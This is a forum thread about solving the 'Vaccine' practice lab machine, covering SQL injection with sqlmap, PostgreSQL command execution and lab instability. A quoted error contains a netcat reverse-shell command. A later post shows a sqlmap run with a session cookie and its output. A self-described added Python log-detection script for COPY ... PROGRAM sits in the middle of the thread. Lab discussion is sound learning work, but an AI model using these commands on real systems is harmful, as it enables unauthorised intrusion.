Machine name: vaccine stuck on getting SQL code execution shell

@sechzehn If you can already navigate through the tables you’re almost done. Think about what you could find in the tables? A username? Maybe a hashed password? On the machine ssh is activated; with your gained information you could just simply log in via ssh instead of trying to upload a shell :wink:

I think it’s not a problem with the machine itself but rather something caused by users messing around in /etc/postgresql, since I had the same problem but was able to complete the machine successfully by exploiting immediately after a reset. Little tip: the section of the walkthrough mentioning vim does not mean you have to edit the file!

Hello everyone,

For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.

Thank you.

@0nenine9 said:

> Hello everyone,
>
> For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.
>
> Thank you.

I’ve been stuck on this for days now because people keep on crashing the server. Literally as soon as a reset vote is done someone almost IMMEDIATELY screws it up again… Very frustrating, especially as this is supposed to be a beginner box.

Does VIP access include VIP access to the starting servers or only the servers past this point? At this stage I’m willing to just throw money at the issue so I can move on.

I’ve been stuck on this box for over a week. I’m double frustrated as I bought VIP access when I first started but can’t use it as this box is in my way.

I was able to get the --os-shell to work earlier but then it timed out when I attempted to execute the reverse bash shell.

Getting through this box is going to need some stubborn determination I think. If anything it’s a good thing that it’s not working because it’s going to force us to think for ourselves and self learn what we don’t know. There will be another way in I am sure.

I’m not using MSF, I’m trying to use it sparingly as I don’t believe MSF is a very good tool for learning. I’m trying a manual exploit but I keep getting timeouts on port 80 which makes that kind of hard.

Hello,

If you want to do it by hand you can follow this link:

And if someone prefers, I coded a python script available here:

good luck

Hello,
I have the same issue: time out when using the --os-shell option with sqlmap.
Doing it manually (with florianges’s python script) does not seem to solve the issue.

Same here with sqlmap and manually or with @florianges script, which is also not working and seems to fail after the last command: “ERROR: program “/tmp/XXXXX/nc 10.10.14.XX 4444 -e /bin/bash” failed DETAIL: command not found”
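The `program "…" failed` / `command not found` pair quoted in the post above is the error PostgreSQL raises when a `COPY … PROGRAM` command exits with a failure status, which makes it a useful log signal on the defending side. The following is an added example, not code from any poster in this thread: it flags `COPY … PROGRAM` statements and their failures in a server log. The log prefix format, table names and sample lines are constructed assumptions.

```python
import re

# Constructed sample in PostgreSQL's stderr log style, assuming
# log_line_prefix = '%m [%p] ' and log_statement = 'all'. Not from the thread.
SAMPLE_LOG = """\
2020-05-01 10:00:01.120 UTC [2211] LOG:  statement: SELECT name FROM cars WHERE name ilike '%a%'
2020-05-01 10:00:07.431 UTC [2211] LOG:  statement: CREATE TABLE t_out(line text)
2020-05-01 10:00:07.502 UTC [2211] LOG:  statement: COPY t_out FROM PROGRAM 'id'
2020-05-01 10:00:09.877 UTC [2211] LOG:  statement: copy t_out from  program '/tmp/example/tool --flag'
2020-05-01 10:00:09.901 UTC [2211] ERROR:  program "/tmp/example/tool --flag" failed
2020-05-01 10:00:09.901 UTC [2211] DETAIL:  command not found
2020-05-01 10:00:12.004 UTC [2215] LOG:  statement: COPY cars TO '/var/tmp/cars.csv'
"""

LINE = re.compile(r"^\S+ \S+ \S+ \[(?P<pid>\d+)\] (?P<level>[A-Z]+):\s+(?P<msg>.*)$")
# COPY ... FROM|TO PROGRAM '<command>' (case-insensitive, '' is an escaped quote)
COPY_PROGRAM = re.compile(
    r"\bCOPY\b.*?\b(FROM|TO)\s+PROGRAM\s+E?'((?:[^']|'')*)'", re.I)
PROGRAM_FAILED = re.compile(r'^program "(.*)" failed$')


def find_copy_program(log_text):
    """Return one event per COPY ... PROGRAM statement or failure in the log."""
    events, pending = [], {}  # pending: pid -> failure event awaiting DETAIL
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        pid, level, msg = m["pid"], m["level"], m["msg"]
        if level == "LOG" and msg.startswith("statement:"):
            hit = COPY_PROGRAM.search(msg)
            if hit:
                events.append({"pid": pid, "kind": "statement",
                               "direction": hit[1].upper(),
                               "command": hit[2].replace("''", "'"),
                               "detail": None})
        elif level == "ERROR" and (hit := PROGRAM_FAILED.match(msg)):
            event = {"pid": pid, "kind": "failed", "direction": None,
                     "command": hit[1], "detail": None}
            events.append(event)
            pending[pid] = event
        elif level == "DETAIL" and pid in pending:
            pending.pop(pid)["detail"] = msg  # e.g. "command not found"
    return events


if __name__ == "__main__":
    for e in find_copy_program(SAMPLE_LOG):
        print(e)
```

The failure events are visible even when statement logging is off, since errors are logged at the default `log_min_messages` level.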

@florianges said:

> Hello,
>
> If you want to do it by hand you can follow this link:
> Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest | by Greenwolf | Greenwolf Security | Medium
>
> And if someone prefers, I coded a python script available here:
> GitHub - florianges/-HTB-Vaccine_sql_injection
>
> good luck

Thanks for this really appreciate the assistance! I finally managed to root this box!

Hello,
@SIFGU and @OS41380

Did you open the script and read the comments and meet all of the requirements listed?
Have you watched the youtube presentation video?

@Pyroteq said:

> @0ne-nine9 said:
>
> > Hello everyone,
> >
> > For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.
> >
> > Thank you.
>
> I’ve been stuck on this for days now because people keep on crashing the server. Literally as soon as a reset vote is done someone almost IMMEDIATELY screws it up again… Very frustrating, especially as this is supposed to be a beginner box.
>
> Does VIP access include VIP access to the starting servers or only the servers past this point? At this stage I’m willing to just throw money at the issue so I can move on.

Hiya,

Yes VIP includes a separate server for starting-point VIP. However, there’s no assurance that VIP members will not create instability on the box, as the number of VIP servers for starting-point is smaller than that of main machines.

Maybe try tackling the machine at a different time of day.

Thanks!

I guess the box is still stuck, I voted to reset the lab.

I really struggled on this one with the same issues, gave up on sqlmap and used @florianges’ Python script. Struggled to understand the nc parameter I was meant to set. Couldn’t get it working at first but in the end I literally followed his video step by step, copied the bin file (cp /bin/nc .) into the same location as the web server and then it worked. I was just taking an nc.exe file and copying it into the location and then setting the parameter to nc.exe but that was wrong.

@florianges this script is awesome - worked perfectly for me! Thanks so much!

@florianges said:

> Hello,
> @SIFGU and @OS41380
>
> Did you open the script and read the comments and meet all of the requirements listed?
> Have you watched the youtube presentation video?
>
> https://www.youtube.com/watch?v=2k7IirmLlxs

I do that,
but nothing showing with “nc”

@ma24th said:

> I do that,
> but nothing showing with “nc”

I think the web server is down now. It was loading fine earlier but it won’t load in the browser now either…

We need 2 more votes to reset the lab in US VIP if you want to join…

Hi guys, need help with this machine… when I run the sqlmap with the right cookie it is giving me a 302 redirect to index.php

Anyone know how to get past this?

sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8"
[21:43:28] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.10.10.46:80/index.php'. Do you want to follow? [Y/n] n
[21:43:29] [INFO] testing if the target URL content is stable
[21:43:29] [WARNING] GET parameter 'search' does not appear to be dynamic
[21:43:30] [WARNING] heuristic (basic) test shows that GET parameter 'search' might not be injectable
[21:43:30] [INFO] testing for SQL injection on GET parameter 'search'
[21:43:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:43:30] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:43:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:43:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:43:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[21:43:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:43:32] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:43:32] [INFO] testing 'Generic inline queries'
[21:43:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:43:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:43:33] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[21:43:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:43:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:43:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[21:43:34] [INFO] testing 'Oracle AND time-based blind'